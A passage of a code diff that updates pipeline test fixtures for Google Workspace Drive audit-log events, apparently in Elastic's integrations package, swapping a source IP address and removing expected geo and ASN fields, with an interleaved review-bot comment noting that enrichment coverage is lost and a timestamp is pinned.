-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"upload","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"view","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"shared_drive_id","value":"1234"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_acl_editors","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_document_access_scope","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"},{"name":"target_domain","value":"all"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_document_visibility","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"},{"name":"target_domain","value":"all"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"shared_drive_membership_change","parameters":[{"name":"added_role","value":"editor"},{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"removed_role","value":"content_manager"},{"name":"membership_change_type","value":"add_to_shared_drive"},{"name":"target","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"shared_drive_settings_change","parameters":[{"name":"new_settings_state","value":"restricted"},{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_settings_state","value":"unrestricted"},{"name":"shared_drive_settings_change_type","value":"direct_acl"},{"name":"target","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"sheets_import_range_access_change","parameters":[{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"sheets_import_range_recipient_doc","value":"1234"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_user_access","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"can_comment"},{"name":"old_value","value":"can_view"},{"name":"old_visibility","value":"people_with_link"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"target_user","value":"user@example.com"},{"name":"visibility","value":"private"},{"name":"visibility_change","value":"external"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"add_to_folder","parameters":[{"name":"billable","boolValue":false},{"name":"destination_folder_id","value":"1234"},{"name":"destination_folder_title","value":"folder title"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"approval_canceled","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"approval_comment_added","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"approval_requested","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"approval_reviewer_responded","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"create","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"delete","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"download","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"edit","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"add_lock","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"move","parameters":[{"name":"billable","boolValue":false},{"name":"destination_folder_id","value":"1234"},{"name":"destination_folder_title","value":"folder title"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"source_folder_id","value":"1234"},{"name":"source_folder_title","value":"a folder title"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"preview","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"print","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"remove_from_folder","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"source_folder_id","value":"1234"},{"name":"source_folder_title","value":"a folder title"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"rename","parameters":[{"name":"billable","boolValue":true},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"bar.gif"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_value","value":"foo.gif","new_value":"bar.gif"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"untrash","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"sheets_import_range","parameters":[{"name":"sheets_import_range_recipient_doc","value":"1234"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"trash","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"remove_lock","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"upload","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"view","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"shared_drive_id","value":"1234"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_acl_editors","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_document_access_scope","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"},{"name":"target_domain","value":"all"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_document_visibility","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"},{"name":"target_domain","value":"all"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"shared_drive_membership_change","parameters":[{"name":"added_role","value":"editor"},{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"removed_role","value":"content_manager"},{"name":"membership_change_type","value":"add_to_shared_drive"},{"name":"target","value":"user@example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"shared_drive_settings_change","parameters":[{"name":"new_settings_state","value":"restricted"},{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_settings_state","value":"unrestricted"},{"name":"shared_drive_settings_change_type","value":"direct_acl"},{"name":"target","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"sheets_import_range_access_change","parameters":[{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"sheets_import_range_recipient_doc","value":"1234"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_user_access","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"can_comment"},{"name":"old_value","value":"can_view"},{"name":"old_visibility","value":"people_with_link"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"target_user","value":"user@example.com"},{"name":"visibility","value":"private"},{"name":"visibility_change","value":"external"}]}}
diff --git a/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log-expected.json b/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log-expected.json
index db0bcf7adbb..3640b63aa91 100644
--- a/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log-expected.json
+++ b/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log-expected.json
@@ -2,31 +2,13 @@
 "expected": [
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
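Review bot: The expected document for the new address carries no `source.geo` or `source.as` block at all — the old enrichment is deleted rather than replaced — so this test no longer verifies the pipeline's geoip/ASN enrichment path; the same applies to the `@@ -101,31 +83,13 @@` hunk below and presumably to the rest of the file. If 67.43.156.13 resolves in the GeoIP database the pipeline test environment ships with, the expected output should contain the corresponding `geo`/`as` fields; if it does not, keep at least one event whose address the test database does resolve so the enrichment processors stay covered. Separately, the `@@ -81,8 +63,8 @@` hunk re-pins `event.ingested` to a wall-clock value (`"ingested": "2021-12-09T13:39:08.398293900Z"`), which will churn on every regeneration unless the test config already treats that field as dynamic — worth confirming.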
@@ -46,7 +28,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -81,8 +63,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822584700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"add_to_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398293900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"add_to_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document 
